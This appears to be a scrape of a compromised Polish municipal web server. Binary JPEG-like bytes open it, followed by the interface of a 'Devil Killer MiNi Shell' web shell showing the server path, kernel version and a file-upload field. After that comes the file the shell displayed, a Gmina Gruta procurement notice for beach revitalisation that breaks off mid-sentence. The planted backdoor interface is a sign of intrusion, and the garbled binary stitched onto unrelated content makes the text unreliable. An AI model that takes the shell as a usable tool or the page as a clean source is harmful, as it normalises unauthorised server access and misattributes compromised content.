JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220301/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220301/0007174202-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Rewitalizacja plaży nad jeziorem Dużym w Grucie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GRUTA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118632</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Gruta 244</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gruta</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-330</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gruta@gruta.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.gruta.akcessnet.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rewitalizacja plaży nad jeziorem Dużym w Grucie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-26221297-9960-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00071742</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00027278/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Rewitalizacja plaży nad jeziorem Dużym w Grucie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Współfinansowane w ramach Poddziałania „Wsparcie na wdrażanie operacji w ramach strategii rozwoju lokalnego kierowanego przez społeczność” w ramach działania „Wsparcie dla rozwoju lokalnego w ramach inicjatywy LEADER” objętego Programem Rozwoju Obszarów Wiejskich na lata 2014-2020 w zakresie: rozwój ogólnodostępnej i niekomercyjnej infrastruktury turystycznej lub rekreacyjnej lub kulturalnej. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.bip.gruta.akcessnet.net/index.php?job=wiad&amp;idg=5&amp;id=920&amp;x=8&amp;y=22&amp;z=&amp;n_id=4623 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/. ePUAPu https://epuap.gov.pl/wps/portal <br/>2.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/warunkiUslugi.aspx oraz Warunkach korzystania ePUAP.<br/>3.	Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>4.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>5.	Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na ePUAP.<br/>6.	Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców&#34; lub ze strony głównej z zakładki Postępowania.<br/>7.	W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy i załączniki do oferty) odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji). Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP).<br/>8.	Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: przetargi@gruta.pl <br/>9.	Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń <br/>składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email: przetargi@gruta.pl. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.(Dz.U.2020.2452). oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od Wykonawcy (Dz.U.2020.2415).<br/>10. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>11. Dokumenty w postępowaniu przekazuje się w wersji elektronicznej opatrzone kwalifikowalnym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. l i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej ,,RODO&#34;, Zamawiający informuje, że:<br/>1.	Administratorem Państwa danych osobowych jest Wójt Gminy Gruta, Gruta 244, 86-330 Gruta, adres e-mail: gruta@gruta.pl , tel. 56 4683 121.<br/>2.	Administrator powołał Inspektora Ochrony Danych (IOD). Z IOD można kontaktować się poprzez wysłanie wiadomości elektronicznej na adres e-mail: iodo@gruta.pl .<br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art.6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego RIR.271.8.2022.MS na zamówienie pn.: Rewitalizacja plaży nad jeziorem Dużym w Grucie prowadzonym w trybie podstawowym bez negocjacji.<br/>4.	Pani/Pana dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>5.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp.<br/><br/>6.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>7.	Posiada Pani/Pan prawo dostępu do danych osobowych, które Panią/Pana dotyczą, prawo do sprostowania Pani/Pana danych osobowych, prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO.<br/>8.	W przypadku gdy uzna Pan/Pani, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO, ma Pani/Pan prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>-	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>-	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>-	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIR.271.8.2022.MS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zakup, dostawa i montaż elementów małej architektury oraz zagospodarowania terenu w ramach realizacji zadania pn.: „REWITALIZACJA PLAŻY NAD JEZIOREM DUŻYM W GRUCIE”.<br/>2.	Przedmiot zamówienia został podzielony na 4 zadania:<br/><br/>Zadanie 1: Zakup i dostawa podestu z desek<br/>Zadanie obejmuje zakup i dostawę:<br/>- deski pomostowe, strugane, antypoślizgowe (ryflowane) o grubości min. 4,8 cm – 198m²<br/>- legary (murłaty) drewniane, rozmiar 8x16 cm – 18,19 m³<br/>- cement – 5,3 tony <br/>- żwir – 40 ton<br/>- łączniki, mocowania (kotwy) do legarów – 300 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44191000-5 - Różne drewniane materiały budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03419100-1 - Produkty z drewna ciętego</p> <p class="mb-0">14212120-7 - Żwir</p> <p class="mb-0">34913800-8 - Kotwy</p> <p class="mb-0">44111200-3 - Cement</p> <p class="mb-0">44523000-2 - Zawiasy, mocowania i osprzęt</p> <p class="mb-0">44523200-4 - Mocowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-05-13</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie kierował się następującymi kryteriami:<br/><br/>a)	Cena - waga kryterium 60 % (max 60 pkt)<br/>b)	Termin realizacji - waga kryterium 40 % (max 40 pkt)<br/><br/>2.	Sposób obliczania wartości punktowej dla poszczególnych kryteriów:<br/><br/>Dla zadania 1, 2, 3 i 4:<br/><br/>a) Kryterium „cena&#34;<br/>-	Ilość punktów w kryterium cena zostanie obliczona na podstawie poniższego wzoru:<br/>-	oferta o najniższej cenie otrzyma 60 pkt.<br/>Kc =Cmin/Cbad x 60 gdzie:<br/>Kc - ilość punktów w kryterium cena<br/>Cmin - najniższa cena spośród ofert nie podlegających odrzuceniu<br/>Cbad - cena oferty badanej<br/><br/>b)	kryterium „termin realizacji” – długość oferowanego terminu wykonania przedmiotu zamówienia<br/><br/>Zamawiający w tym kryterium przydzieli punktację według poniższego wzoru:<br/><br/>Dla każdego zadania tj. 1, 2, 3 i 4:<br/><br/><br/><br/>- do 08.04.2022 r. – 40 punktów<br/>- do 22.04.2022 r. – 30 punktów<br/>- do 29.04.2022 r. – 20 punktów<br/>- do 06.05.2022 r. – 10 punktów<br/>- do 13.05.2022 r. – 0 punktów<br/><br/>3.	Każdej ofercie, złożonej na wykonanie przedmiotu zamówienia zostanie przyznana liczba punktów wg wzoru:<br/>K = Kc + Kt<br/>Gdzie:<br/>Kc - ilość punktów w kryterium cena<br/>Kt - ilość przyznanych punktów w kryterium termin realizacji <br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>5.	Zamawiający wybiera najkorzystniejszą ofertą w terminie związania ofertą określonym w SWZ.<br/>6.	Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>7.	W przypadku braku zgody, o której mowa w ust. 6, oferta podlega odrzuceniu, a Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba ze zachodzą przesłanki do unieważnienia postępowania.<br/>8.	Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert niepodlegających odrzuceniu wśród ofert złożonych na realizację przedmiotów zamówienia.<br/>9.	Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>10.	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>11.	Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 10, Zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zakup, dostawa i montaż elementów małej architektury oraz zagospodarowania terenu w ramach realizacji zadania pn.: „REWITALIZACJA PLAŻY NAD JEZIOREM DUŻYM W GRUCIE”.<br/><br/>2.	Przedmiot zamówienia został podzielony na 4 zadania:<br/><br/>Zadanie 2: Zakup, dostawa i montaż elementów małej architektury oraz zagospodarowania terenu<br/>Zadanie obejmuje zakup, dostawę i montaż:<br/>- leżaki betonowe z siedziskiem drewnianym – 5 szt.<br/>- parasole ze strzechy z podstawą fundamentową – 4 szt.<br/>- sztuczne palmy z podstawą – 4 szt.<br/>- kosz na śmieci – 1 szt.<br/>- ławki betonowe z siedziskiem drewnianym – 3 szt.<br/>- ławostoły – 4 szt.<br/>- tablica informacyjna T3 – 1 szt.<br/>- palenisko (ognisko): Trójnóg XXL + ruszt (o średnicy min. 1 m) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37416000-7 - Sprzęt wypoczynkowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30192170-3 - Tablice ogłoszeń</p> <p class="mb-0">34928480-6 - Pojemniki i kosze na odpady i śmieci</p> <p class="mb-0">39110000-6 - Siedziska, krzesła i produkty z nimi związane, i ich części</p> <p class="mb-0">39113000-7 - Różne siedziska i krzesła</p> <p class="mb-0">39113600-3 - Ławki</p> <p class="mb-0">39295100-7 - Parasole przeciwsłoneczne</p> <p class="mb-0">42214110-3 - Grille</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-05-13</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie kierował się następującymi kryteriami:<br/><br/>a)	Cena - waga kryterium 60 % (max 60 pkt)<br/>b)	Termin realizacji - waga kryterium 40 % (max 40 pkt)<br/><br/>2.	Sposób obliczania wartości punktowej dla poszczególnych kryteriów:<br/><br/>Dla zadania 1, 2, 3 i 4:<br/><br/>a) Kryterium „cena&#34;<br/>-	Ilość punktów w kryterium cena zostanie obliczona na podstawie poniższego wzoru:<br/>-	oferta o najniższej cenie otrzyma 60 pkt.<br/>Kc =Cmin/Cbad x 60 gdzie:<br/>Kc - ilość punktów w kryterium cena<br/>Cmin - najniższa cena spośród ofert nie podlegających odrzuceniu<br/>Cbad - cena oferty badanej<br/><br/>b)	kryterium „termin realizacji” – długość oferowanego terminu wykonania przedmiotu zamówienia<br/><br/>Zamawiający w tym kryterium przydzieli punktację według poniższego wzoru:<br/><br/>Dla każdego zadania tj. 1, 2, 3 i 4:<br/><br/><br/><br/>- do 08.04.2022 r. – 40 punktów<br/>- do 22.04.2022 r. – 30 punktów<br/>- do 29.04.2022 r. – 20 punktów<br/>- do 06.05.2022 r. – 10 punktów<br/>- do 13.05.2022 r. – 0 punktów<br/><br/>3.	Każdej ofercie, złożonej na wykonanie przedmiotu zamówienia zostanie przyznana liczba punktów wg wzoru:<br/>K = Kc + Kt<br/>Gdzie:<br/>Kc - ilość punktów w kryterium cena<br/>Kt - ilość przyznanych punktów w kryterium termin realizacji <br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>5.	Zamawiający wybiera najkorzystniejszą ofertą w terminie związania ofertą określonym w SWZ.<br/>6.	Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>7.	W przypadku braku zgody, o której mowa w ust. 6, oferta podlega odrzuceniu, a Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba ze zachodzą przesłanki do unieważnienia postępowania.<br/>8.	Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert niepodlegających odrzuceniu wśród ofert złożonych na realizację przedmiotów zamówienia.<br/>9.	Jeżeli nie można wybrać oferty najkorzystniejszej z 